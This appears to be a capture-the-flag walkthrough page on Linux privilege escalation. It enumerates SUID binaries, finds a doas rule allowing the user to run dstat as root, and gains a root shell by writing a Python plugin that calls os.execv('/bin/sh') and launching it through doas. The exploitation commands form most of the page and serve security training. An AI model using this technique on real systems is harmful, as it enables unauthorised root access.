PrivEsc

The user cannot run sudo.

SUID Binaries

find / -perm -4000 2>/dev/null

/usr/local/bin/doas
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/bin/umount
/usr/bin/fusermount
/usr/bin/mount
<SNIP>

doas is there. Looking for the .conf location:

find / -type f -name "doas.conf" 2>/dev/null

/usr/local/etc/doas.conf

Inside the file it says

permit nopass player as root cmd /usr/bin/dstat

Our user can run dstat as root. So checking GTFObins we follow the instructions and get a shell as root.

echo 'import os; os.execv("/bin/sh", ["sh"])' >/usr/local/share/dstat/dstat_xxx.py
doas -u root /usr/bin/dstat --xxx

PreviousEnumeration NextUnion

Last updated 10 months ago